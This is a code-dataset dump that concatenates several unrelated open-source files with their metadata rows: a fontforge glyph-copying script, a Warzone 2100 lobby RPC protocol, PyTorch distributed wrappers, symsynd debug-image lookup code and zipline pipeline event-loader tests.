print(red('\n***\nomop_harvest Production Clone now running on: http://localhost:{0}'.format(omop_harvest_port)))
| bsd-2-clause | -3,427,390,257,368,080,400 | 42.146453 | 284 | 0.627208 | false |
jkriege2/JKQtPlotter | lib/jkqtmathtext/resources/xits/tools/copy-math-from-amiri.py | 2 | 1252 | import sys
import fontforge
amiri = fontforge.open(sys.argv[1])
xits = fontforge.open(sys.argv[2])
amiri.em = 1000
amiri.layers[1].is_quadratic = 0
amiri.selection.all()
amiri.unlinkReferences()
names = []
alts = []
for aglyph in amiri.glyphs():
u = aglyph.unicode
if (u in range(0x1EE00, 0x1EF00) or
u in range(0x0660, 0x066E) or
u in range(0x06F0, 0x06FA) or
u in range(0x0608, 0x060B) or
u == 0x060C):
names.append(aglyph.name)
for aglyph in amiri.glyphs():
for name in names:
if aglyph.name != name and aglyph.name.startswith(name + ".alt"):
alts.append(aglyph.name)
for name in names + alts:
aglyph = amiri[name]
if aglyph.name not in xits:
xits.createChar(aglyph.unicode, aglyph.name)
xglyph = xits[aglyph.name]
aglyph.draw(xglyph.glyphPen())
xglyph.width = aglyph.width
xglyph.round()
xglyph.autoHint()
for name in alts:
base, ext = name.split(".")
if ext.startswith("alt"):
xits[base].addPosSub("'cv01' Alternate Arabic Math symbols-1", name)
elif ext.startswith("display"):
xits[base].verticalVariants = (xits[base], xits[name])
else:
print "Unknown alternate glyph:", name
xits.save()
| lgpl-2.1 | -6,084,916,335,181,398,000 | 24.55102 | 76 | 0.640575 | false |
pcdummy/wzlobbyserver-ng | wzlobby/protocol/protocol4.py | 1 | 6682 | # -*- coding: utf-8 -*-
# vim: set et sts=4 sw=4 encoding=utf-8:
#
# This file is part of Warzone 2100.
# Copyright (C) 2011 Warzone 2100 Project
#
# Warzone 2100 is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Warzone 2100 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Warzone 2100; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
###############################################################################
# This is the V4 Variant of the Protocol - BSON.
__all__ = ['Protocol4']
from twisted.internet import defer
from twisted.python import log
from socketrpc.twisted_srpc import SocketRPCProtocol, set_serializer, Fault
from wzlobby import settings
set_serializer('jsonlib')
NO_GAME = -402
NOT_ACCEPTABLE = -403
WRONG_LOGIN = -404
LOGIN_REQUIRED = -405
SESSION_INVALID = -406
class Protocol4(SocketRPCProtocol):
game = None
lobbyVersion = 4
def connectionMade(self):
SocketRPCProtocol.connectionMade(self)
self.debug = settings.debug
self.gameDB = self.factory.gameDB
self.db = self.factory.db
self.authenticated = False
def dispatch_call(self, method, id, args, kwargs):
if not self.authenticated \
and settings.login_required \
and method != 'login':
log.msg('Not executing %s - login required' % method)
return defer.fail(
Fault(LOGIN_REQUIRED, "Please login first!")
)
log.msg('executing docall_%s' % method)
return SocketRPCProtocol.dispatch_call(self, method, id, args, kwargs)
def docall_login(self, username, password=None, token=None):
def check_pass_cb(result):
# Login ok
self.authenticated = True
return result
def check_pass_eb(failure):
self.authenticated = False
return defer.fail(Fault(WRONG_LOGIN, "Password login failed, unknown user or wrong password!"))
def check_token_cb(result):
# Token login ok
self.authenticated = True
return result
def check_token_eb(failure):
self.authenticated = False
return defer.fail(Fault(WRONG_LOGIN, "Token login failed, unknown user or wrong password!"))
if token is None:
d = self.db.check_user_password(username, password, self.transport.getPeer().host)
d.addCallbacks(check_pass_cb, check_pass_eb)
else:
d = self.db.check_user_token(username, token, self.transport.getPeer().host)
d.addCallbacks(check_token_cb, check_token_eb)
return d
def docall_logout(self):
self.authenticated = False
return defer.succeed("")
def docall_addGame(self, *args, **kwargs):
def checkFailed(reason):
return defer.fail(
Fault(
NOT_ACCEPTABLE,
reason.getErrorMessage()
)
)
def checkDone(result):
self.gameDB.register(game)
log.msg('new game %d: "%s" from "%s".' % (game['gameId'],
game['description'].encode('utf8'),
game['hostplayer'].encode('utf8')))
return {"gameId": game['gameId'],
"result": result}
game = self.gameDB.create(self.lobbyVersion)
# Update the game with the received data
for k, v in kwargs.iteritems():
try:
game[k] = v
except KeyError:
pass
# Add hosts ip
game['host'] = self.transport.getPeer().host
d = self.gameDB.check(game)
d.addCallback(checkDone)
d.addErrback(checkFailed)
return d
def docall_delGame(self, gameId):
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
self.gameDB.remove(game)
return defer.succeed('')
def docall_addPlayer(self, gameId, slot, name, username, session):
def check_cb(result):
if result:
game['currentPlayers'] += 1
return defer.succeed('')
else:
return defer.fail(Fault(SESSION_INVALID, 'Users session is invalid!'))
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
d = self.db.check_user_session(username, session)
d.addCallback(check_cb)
return d
def docall_delPlayer(self, gameId, slot):
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
game['currentPlayers'] -= 1
return defer.succeed('')
def docall_updatePlayer(self, gameId, slot, name):
return defer.succeed('')
def docall_list(self, maxgames=9999):
maxgames = int(maxgames);
games = []
for game in self.gameDB.itervalues():
# Skip empty games.
if not game['description']:
continue
games.append({
"host" : game["host"],
"port" : game["port"],
"description" : game["description"],
"currentPlayers" : game["currentPlayers"],
"maxPlayers" : game["maxPlayers"],
"multiVer" : game["multiVer"],
"wzVerMajor" : game["wzVerMajor"],
"wzVerMinor" : game["wzVerMinor"],
"isPrivate" : game["isPrivate"],
"modlist" : game["modlist"],
"mapname" : game["mapname"],
"hostplayer" : game["hostplayer"],
})
maxgames -= 1
if maxgames == 0:
break;
return defer.succeed(games)
| gpl-2.0 | 7,357,415,535,087,798,000 | 29.372727 | 107 | 0.550883 | false |
RPGOne/Skynet | pytorch-master/torch/distributed/collectives.py | 1 | 2102 | import torch
class reduce_op(object):
SUM = object()
PRODUCT = object()
MAX = object()
MIN = object()
class group(object):
WORLD = object()
class _DistributedRequest(object):
def __init__(self, request):
self.request = request
def is_completed(self):
return torch._C._dist_request_is_completed(self.request)
def wait(self):
torch._C._dist_request_wait(self.request)
def get_rank():
return torch._C._dist_get_rank()
def get_num_processes():
return torch._C._dist_get_num_processes()
def isend(tensor, dst_rank):
return _DistributedRequest(torch._C._dist_isend(tensor, dst_rank))
def irecv(tensor, src_rank):
return _DistributedRequest(torch._C._dist_irecv(tensor, src_rank))
def send(tensor, dst_rank):
return torch._C._dist_send(tensor, dst_rank)
def recv(tensor, src_rank=None):
if src_rank is None:
return torch._C._dist_recv_any_source(tensor)
return torch._C._dist_recv(tensor, src_rank)
def broadcast(tensor, src_rank, group=group.WORLD):
return torch._C._dist_broadcast(tensor, src_rank, group)
def all_reduce(tensor, op=reduce_op.SUM, group=group.WORLD):
return torch._C._dist_all_reduce(tensor, op, group)
def reduce(tensor, dst_rank, op=reduce_op.SUM, group=group.WORLD):
return torch._C._dist_reduce(tensor, dst_rank, op, group)
def all_gather(tensors, tensor, group=group.WORLD):
return torch._C._dist_all_gather(tensors, tensor, group)
def gather_send(tensor, dst_rank, group=group.WORLD):
return torch._C._dist_gather_send(tensor, dst_rank, group)
def gather_recv(tensors, tensor, group=group.WORLD):
return torch._C._dist_gather_recv(tensors, tensor, group)
def scatter_send(tensors, tensor, group=group.WORLD):
return torch._C._dist_scatter_send(tensors, tensor, group)
def scatter_recv(tensor, src_rank, group=group.WORLD):
return torch._C._dist_scatter_recv(tensor, src_rank, group)
def barrier(group=group.WORLD):
return torch._C._dist_barrier(group)
def new_group(ranks):
return torch._C._dist_new_group(ranks)
| bsd-3-clause | 4,712,149,255,523,797,000 | 22.617978 | 70 | 0.685062 | false |
getsentry/symsynd | symsynd/images.py | 1 | 4038 | import os
import bisect
from symsynd.libdebug import get_cpu_name, DebugInfo
from symsynd.exceptions import DebugInfoError
from symsynd.utils import timedsection, parse_addr
from symsynd._compat import string_types, itervalues
def get_image_cpu_name(image):
cpu_name = image.get('cpu_name')
if cpu_name is not None:
return cpu_name
return get_cpu_name(image['cpu_type'], image['cpu_subtype'])
def find_debug_images(dsym_paths, binary_images):
"""Given a list of paths and a list of binary images this returns a
dictionary of image addresses to the locations on the file system for
all found images.
"""
images_to_load = set()
with timedsection('iterimages0'):
for image in binary_images:
if get_image_cpu_name(image) is not None:
images_to_load.add(image['uuid'].lower())
images = {}
# Step one: load images that are named by their UUID
with timedsection('loadimages-fast'):
for uuid in list(images_to_load):
for dsym_path in dsym_paths:
fn = os.path.join(dsym_path, uuid)
if os.path.isfile(fn):
images[uuid] = fn
images_to_load.discard(uuid)
break
# Otherwise fall back to loading images from the dsym bundle. Because
# this loading strategy is pretty slow we do't actually want to use it
# unless we have a path that looks like a bundle. As a result we
# find all the paths which are bundles and then only process those.
if images_to_load:
slow_paths = []
for dsym_path in dsym_paths:
if os.path.isdir(os.path.join(dsym_path, 'Contents')):
slow_paths.append(dsym_path)
with timedsection('loadimages-slow'):
for dsym_path in slow_paths:
dwarf_base = os.path.join(dsym_path, 'Contents',
'Resources', 'DWARF')
if os.path.isdir(dwarf_base):
for fn in os.listdir(dwarf_base):
# Looks like a UUID we loaded, skip it
if fn in images:
continue
full_fn = os.path.join(dwarf_base, fn)
try:
di = DebugInfo.open_path(full_fn)
except DebugInfoError:
continue
for variant in di.get_variants():
uuid = str(variant.uuid)
if uuid in images_to_load:
images[uuid] = full_fn
images_to_load.discard(uuid)
rv = {}
# Now resolve all the images.
with timedsection('resolveimages'):
for image in binary_images:
cpu_name = get_image_cpu_name(image)
if cpu_name is None:
continue
uid = image['uuid'].lower()
if uid not in images:
continue
rv[parse_addr(image['image_addr'])] = images[uid]
return rv
class ImageLookup(object):
"""Helper object to locate images."""
def __init__(self, images):
self._image_addresses = []
self.images = {}
for img in images:
img_addr = parse_addr(img['image_addr'])
self._image_addresses.append(img_addr)
self.images[img_addr] = img
self._image_addresses.sort()
def iter_images(self):
return itervalues(self.images)
def get_uuids(self):
return list(self.iter_uuids())
def iter_uuids(self):
for img in self.iter_images():
yield img['uuid']
def find_image(self, addr):
"""Given an instruction address this locates the image this address
is contained in.
"""
idx = bisect.bisect_left(self._image_addresses, parse_addr(addr))
if idx > 0:
return self.images[self._image_addresses[idx - 1]]
| bsd-3-clause | -2,597,764,121,753,902,000 | 34.113043 | 75 | 0.552006 | false |
quantopian/zipline | tests/pipeline/test_events.py | 1 | 22248 | """
Tests for setting up an EventsLoader and a BlazeEventsLoader.
"""
from datetime import time
from itertools import product
from unittest import skipIf
import blaze as bz
import numpy as np
import pandas as pd
import pytz
from zipline.pipeline import Pipeline, SimplePipelineEngine
from zipline.pipeline.common import (
EVENT_DATE_FIELD_NAME,
TS_FIELD_NAME,
SID_FIELD_NAME,
)
from zipline.pipeline.data import DataSet, Column
from zipline.pipeline.domain import US_EQUITIES, EquitySessionDomain
from zipline.pipeline.loaders.events import EventsLoader
from zipline.pipeline.loaders.blaze.events import BlazeEventsLoader
from zipline.pipeline.loaders.utils import (
next_event_indexer,
previous_event_indexer,
)
from zipline.testing import ZiplineTestCase
from zipline.testing.fixtures import (
WithAssetFinder,
WithTradingSessions,
)
from zipline.testing.predicates import assert_equal
from zipline.utils.numpy_utils import (
categorical_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.pandas_utils import new_pandas, skip_pipeline_new_pandas
class EventDataSet(DataSet):
previous_event_date = Column(dtype=datetime64ns_dtype)
next_event_date = Column(dtype=datetime64ns_dtype)
previous_float = Column(dtype=float64_dtype)
next_float = Column(dtype=float64_dtype)
previous_datetime = Column(dtype=datetime64ns_dtype)
next_datetime = Column(dtype=datetime64ns_dtype)
previous_int = Column(dtype=int64_dtype, missing_value=-1)
next_int = Column(dtype=int64_dtype, missing_value=-1)
previous_string = Column(dtype=categorical_dtype, missing_value=None)
next_string = Column(dtype=categorical_dtype, missing_value=None)
previous_string_custom_missing = Column(
dtype=categorical_dtype,
missing_value=u"<<NULL>>",
)
next_string_custom_missing = Column(
dtype=categorical_dtype,
missing_value=u"<<NULL>>",
)
EventDataSet_US = EventDataSet.specialize(US_EQUITIES)
critical_dates = pd.to_datetime([
'2014-01-05',
'2014-01-10',
'2014-01-15',
'2014-01-20',
])
def make_events_for_sid(sid, event_dates, event_timestamps):
num_events = len(event_dates)
return pd.DataFrame({
'sid': np.full(num_events, sid, dtype=np.int64),
'timestamp': event_timestamps,
'event_date': event_dates,
'float': np.arange(num_events, dtype=np.float64) + sid,
'int': np.arange(num_events) + sid,
'datetime': pd.date_range('1990-01-01', periods=num_events).shift(sid),
'string': ['-'.join([str(sid), str(i)]) for i in range(num_events)],
})
def make_null_event_date_events(all_sids, timestamp):
"""
Make an event with a null event_date for all sids.
Used to test that EventsLoaders filter out null events.
"""
return pd.DataFrame({
'sid': all_sids,
'timestamp': timestamp,
'event_date': pd.Timestamp('NaT'),
'float': -9999.0,
'int': -9999,
'datetime': pd.Timestamp('1980'),
'string': 'should be ignored',
})
def make_events(add_nulls):
"""
Every event has at least three pieces of data associated with it:
1. sid : The ID of the asset associated with the event.
2. event_date : The date on which an event occurred.
3. timestamp : The date on which we learned about the event.
This can be before the occurence_date in the case of an
announcement about an upcoming event.
Events for two different sids shouldn't interact in any way, so the
interesting cases are determined by the possible interleavings of
event_date and timestamp for a single sid.
Fix two events with dates e1, e2 and timestamps t1 and t2.
Without loss of generality, assume that e1 < e2. (If two events have the
same occurrence date, the behavior of next/previous event is undefined).
The remaining possible sequences of events are given by taking all possible
4-tuples of four ascending dates. For each possible interleaving, we
generate a set of fake events with those dates and assign them to a new
sid.
"""
def gen_date_interleavings():
for e1, e2, t1, t2 in product(*[critical_dates] * 4):
if e1 < e2:
yield (e1, e2, t1, t2)
event_frames = []
for sid, (e1, e2, t1, t2) in enumerate(gen_date_interleavings()):
event_frames.append(make_events_for_sid(sid, [e1, e2], [t1, t2]))
if add_nulls:
for date in critical_dates:
event_frames.append(
make_null_event_date_events(
np.arange(sid + 1),
timestamp=date,
)
)
return pd.concat(event_frames, ignore_index=True)
class EventIndexerTestCase(ZiplineTestCase):
@classmethod
def init_class_fixtures(cls):
super(EventIndexerTestCase, cls).init_class_fixtures()
cls.events = make_events(add_nulls=False).sort_values('event_date')
cls.events.reset_index(inplace=True)
def test_previous_event_indexer(self):
events = self.events
event_sids = events['sid'].values
event_dates = events['event_date'].values
event_timestamps = events['timestamp'].values
all_dates = pd.date_range('2014', '2014-01-31')
all_sids = np.unique(event_sids)
domain = EquitySessionDomain(
all_dates,
'US',
time(8, 45, tzinfo=pytz.timezone('US/Eastern')),
)
indexer = previous_event_indexer(
domain.data_query_cutoff_for_sessions(all_dates),
all_sids,
event_dates,
event_timestamps,
event_sids,
)
# Compute expected results without knowledge of null events.
for i, sid in enumerate(all_sids):
self.check_previous_event_indexer(
events,
all_dates,
sid,
indexer[:, i],
)
def check_previous_event_indexer(self,
events,
all_dates,
sid,
indexer):
relevant_events = events[events.sid == sid]
self.assertEqual(len(relevant_events), 2)
ix1, ix2 = relevant_events.index
# An event becomes a possible value once we're past both its event_date
# and its timestamp.
event1_first_eligible = max(
relevant_events.loc[ix1, ['event_date', 'timestamp']],
)
event2_first_eligible = max(
relevant_events.loc[ix2, ['event_date', 'timestamp']],
)
for date, computed_index in zip(all_dates, indexer):
if date >= event2_first_eligible:
# If we've seen event 2, it should win even if we've seen event
# 1, because events are sorted by event_date.
self.assertEqual(computed_index, ix2)
elif date >= event1_first_eligible:
# If we've seen event 1 but not event 2, event 1 should win.
self.assertEqual(computed_index, ix1)
else:
# If we haven't seen either event, then we should have -1 as
# sentinel.
self.assertEqual(computed_index, -1)
def test_next_event_indexer(self):
events = self.events
event_sids = events['sid'].values
event_dates = events['event_date'].values
event_timestamps = events['timestamp'].values
all_dates = pd.date_range('2014', '2014-01-31', tz='UTC')
all_sids = np.unique(event_sids)
domain = EquitySessionDomain(
all_dates,
'US',
time(8, 45, tzinfo=pytz.timezone('US/Eastern')),
)
indexer = next_event_indexer(
all_dates,
domain.data_query_cutoff_for_sessions(all_dates),
all_sids,
event_dates,
event_timestamps,
event_sids,
)
# Compute expected results without knowledge of null events.
for i, sid in enumerate(all_sids):
self.check_next_event_indexer(
events,
all_dates,
sid,
indexer[:, i],
)
def check_next_event_indexer(self,
events,
all_dates,
sid,
indexer):
relevant_events = events[events.sid == sid]
self.assertEqual(len(relevant_events), 2)
ix1, ix2 = relevant_events.index
e1, e2 = relevant_events['event_date'].dt.tz_localize('UTC')
t1, t2 = relevant_events['timestamp'].dt.tz_localize('UTC')
for date, computed_index in zip(all_dates, indexer):
# An event is eligible to be the next event if it's between the
# timestamp and the event_date, inclusive.
if t1 <= date <= e1:
# If e1 is eligible, it should be chosen even if e2 is
# eligible, since it's earlier.
self.assertEqual(computed_index, ix1)
elif t2 <= date <= e2:
# e2 is eligible and e1 is not, so e2 should be chosen.
self.assertEqual(computed_index, ix2)
else:
# Neither event is eligible. Return -1 as a sentinel.
self.assertEqual(computed_index, -1)
class EventsLoaderEmptyTestCase(WithAssetFinder,
WithTradingSessions,
ZiplineTestCase):
START_DATE = pd.Timestamp('2014-01-01')
END_DATE = pd.Timestamp('2014-01-30')
ASSET_FINDER_COUNTRY_CODE = 'US'
@classmethod
def init_class_fixtures(cls):
cls.ASSET_FINDER_EQUITY_SIDS = [0, 1]
cls.ASSET_FINDER_EQUITY_SYMBOLS = ['A', 'B']
super(EventsLoaderEmptyTestCase, cls).init_class_fixtures()
def frame_containing_all_missing_values(self, index, columns):
frame = pd.DataFrame(
index=index,
data={c.name: c.missing_value for c in EventDataSet.columns},
)
for c in columns:
# The construction above produces columns of dtype `object` when
# the missing value is string, but we expect categoricals in the
# final result.
if c.dtype == categorical_dtype:
frame[c.name] = frame[c.name].astype('category')
return frame
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_empty(self):
"""
For the case where raw data is empty, make sure we have a result for
all sids, that the dimensions are correct, and that we have the
correct missing value.
"""
raw_events = pd.DataFrame(
columns=["sid",
"timestamp",
"event_date",
"float",
"int",
"datetime",
"string"]
)
next_value_columns = {
EventDataSet_US.next_datetime: 'datetime',
EventDataSet_US.next_event_date: 'event_date',
EventDataSet_US.next_float: 'float',
EventDataSet_US.next_int: 'int',
EventDataSet_US.next_string: 'string',
EventDataSet_US.next_string_custom_missing: 'string'
}
previous_value_columns = {
EventDataSet_US.previous_datetime: 'datetime',
EventDataSet_US.previous_event_date: 'event_date',
EventDataSet_US.previous_float: 'float',
EventDataSet_US.previous_int: 'int',
EventDataSet_US.previous_string: 'string',
EventDataSet_US.previous_string_custom_missing: 'string'
}
loader = EventsLoader(
raw_events, next_value_columns, previous_value_columns
)
engine = SimplePipelineEngine(
lambda x: loader,
self.asset_finder,
)
results = engine.run_pipeline(
Pipeline({
c.name: c.latest for c in EventDataSet_US.columns
}, domain=US_EQUITIES),
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
assets = self.asset_finder.retrieve_all(self.ASSET_FINDER_EQUITY_SIDS)
dates = self.trading_days
expected = self.frame_containing_all_missing_values(
index=pd.MultiIndex.from_product([dates, assets]),
columns=EventDataSet_US.columns,
)
assert_equal(results, expected)
class EventsLoaderTestCase(WithAssetFinder,
WithTradingSessions,
ZiplineTestCase):
START_DATE = pd.Timestamp('2014-01-01')
END_DATE = pd.Timestamp('2014-01-30')
ASSET_FINDER_COUNTRY_CODE = 'US'
@classmethod
def init_class_fixtures(cls):
# This is a rare case where we actually want to do work **before** we
# call init_class_fixtures. We choose our sids for WithAssetFinder
# based on the events generated by make_event_data.
cls.raw_events = make_events(add_nulls=True)
cls.raw_events_no_nulls = cls.raw_events[
cls.raw_events['event_date'].notnull()
]
cls.next_value_columns = {
EventDataSet_US.next_datetime: 'datetime',
EventDataSet_US.next_event_date: 'event_date',
EventDataSet_US.next_float: 'float',
EventDataSet_US.next_int: 'int',
EventDataSet_US.next_string: 'string',
EventDataSet_US.next_string_custom_missing: 'string'
}
cls.previous_value_columns = {
EventDataSet_US.previous_datetime: 'datetime',
EventDataSet_US.previous_event_date: 'event_date',
EventDataSet_US.previous_float: 'float',
EventDataSet_US.previous_int: 'int',
EventDataSet_US.previous_string: 'string',
EventDataSet_US.previous_string_custom_missing: 'string'
}
cls.loader = cls.make_loader(
events=cls.raw_events,
next_value_columns=cls.next_value_columns,
previous_value_columns=cls.previous_value_columns,
)
cls.ASSET_FINDER_EQUITY_SIDS = list(cls.raw_events['sid'].unique())
cls.ASSET_FINDER_EQUITY_SYMBOLS = [
's' + str(n) for n in cls.ASSET_FINDER_EQUITY_SIDS
]
super(EventsLoaderTestCase, cls).init_class_fixtures()
cls.engine = SimplePipelineEngine(
lambda c: cls.loader,
asset_finder=cls.asset_finder,
default_domain=US_EQUITIES,
)
@classmethod
def make_loader(cls, events, next_value_columns, previous_value_columns):
# This method exists to be overridden by BlazeEventsLoaderTestCase
return EventsLoader(events, next_value_columns, previous_value_columns)
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_with_trading_calendar(self):
results = self.engine.run_pipeline(
Pipeline({c.name: c.latest for c in EventDataSet_US.columns}),
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
for c in EventDataSet_US.columns:
if c in self.next_value_columns:
self.check_next_value_results(
c,
results[c.name].unstack(),
self.trading_days,
)
elif c in self.previous_value_columns:
self.check_previous_value_results(
c,
results[c.name].unstack(),
self.trading_days,
)
else:
raise AssertionError("Unexpected column %s." % c)
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_properly_forward_fills(self):
# Cut the dates in half so we need to forward fill some data which
# is not in our window. The results should be computed the same as if
# we had computed across the entire window and then sliced after the
# computation.
dates = self.trading_days[len(self.trading_days) // 2:]
results = self.engine.run_pipeline(
Pipeline({c.name: c.latest for c in EventDataSet_US.columns}),
start_date=dates[0],
end_date=dates[-1],
)
for c in EventDataSet_US.columns:
if c in self.next_value_columns:
self.check_next_value_results(
c,
results[c.name].unstack(),
dates,
)
elif c in self.previous_value_columns:
self.check_previous_value_results(
c,
results[c.name].unstack(),
dates,
)
else:
raise AssertionError("Unexpected column %s." % c)
def assert_result_contains_all_sids(self, results):
assert_equal(
list(map(int, results.columns)),
self.ASSET_FINDER_EQUITY_SIDS,
)
def check_previous_value_results(self, column, results, dates):
"""
Check previous value results for a single column.
"""
# Verify that we got a result for every sid.
self.assert_result_contains_all_sids(results)
events = self.raw_events_no_nulls
# Remove timezone info from trading days, since the outputs
# from pandas won't be tz_localized.
dates = dates.tz_localize(None)
for asset, asset_result in results.iteritems():
relevant_events = events[events.sid == asset.sid]
self.assertEqual(len(relevant_events), 2)
v1, v2 = relevant_events[self.previous_value_columns[column]]
event1_first_eligible = max(
# .ix doesn't work here because the frame index contains
# integers, so 0 is still interpreted as a key.
relevant_events.iloc[0].loc[['event_date', 'timestamp']],
)
event2_first_eligible = max(
relevant_events.iloc[1].loc[['event_date', 'timestamp']]
)
for date, computed_value in zip(dates, asset_result):
if date >= event2_first_eligible:
# If we've seen event 2, it should win even if we've seen
# event 1, because events are sorted by event_date.
self.assertEqual(computed_value, v2)
elif date >= event1_first_eligible:
# If we've seen event 1 but not event 2, event 1 should
# win.
self.assertEqual(computed_value, v1)
else:
# If we haven't seen either event, then we should have
# column.missing_value.
assert_equal(
computed_value,
column.missing_value,
# Coerce from Timestamp to datetime64.
allow_datetime_coercions=True,
)
def check_next_value_results(self, column, results, dates):
"""
Check results for a single column.
"""
self.assert_result_contains_all_sids(results)
events = self.raw_events_no_nulls
# Remove timezone info from trading days, since the outputs
# from pandas won't be tz_localized.
dates = dates.tz_localize(None)
for asset, asset_result in results.iteritems():
relevant_events = events[events.sid == asset.sid]
self.assertEqual(len(relevant_events), 2)
v1, v2 = relevant_events[self.next_value_columns[column]]
e1, e2 = relevant_events['event_date']
t1, t2 = relevant_events['timestamp']
for date, computed_value in zip(dates, asset_result):
if t1 <= date <= e1:
# If we've seen event 2, it should win even if we've seen
# event 1, because events are sorted by event_date.
self.assertEqual(computed_value, v1)
elif t2 <= date <= e2:
# If we've seen event 1 but not event 2, event 1 should
# win.
self.assertEqual(computed_value, v2)
else:
# If we haven't seen either event, then we should have
# column.missing_value.
assert_equal(
computed_value,
column.missing_value,
# Coerce from Timestamp to datetime64.
allow_datetime_coercions=True,
)
def test_wrong_cols(self):
# Test wrong cols (cols != expected)
events = pd.DataFrame({
'c': [5],
SID_FIELD_NAME: [1],
TS_FIELD_NAME: [pd.Timestamp('2014')],
EVENT_DATE_FIELD_NAME: [pd.Timestamp('2014')],
})
EventsLoader(events, {EventDataSet_US.next_float: 'c'}, {})
EventsLoader(events, {}, {EventDataSet_US.previous_float: 'c'})
with self.assertRaises(ValueError) as e:
EventsLoader(events, {EventDataSet_US.next_float: 'd'}, {})
msg = str(e.exception)
expected = (
"EventsLoader missing required columns ['d'].\n"
"Got Columns: ['c', 'event_date', 'sid', 'timestamp']\n"
"Expected Columns: ['d', 'event_date', 'sid', 'timestamp']"
)
self.assertEqual(msg, expected)
class BlazeEventsLoaderTestCase(EventsLoaderTestCase):
"""
Run the same tests as EventsLoaderTestCase, but using a BlazeEventsLoader.
"""
@classmethod
def make_loader(cls, events, next_value_columns, previous_value_columns):
return BlazeEventsLoader(
bz.data(events),
next_value_columns,
previous_value_columns,
)
| apache-2.0 | 8,105,170,151,466,807,000 | 35.834437 | 79 | 0.572726 | false |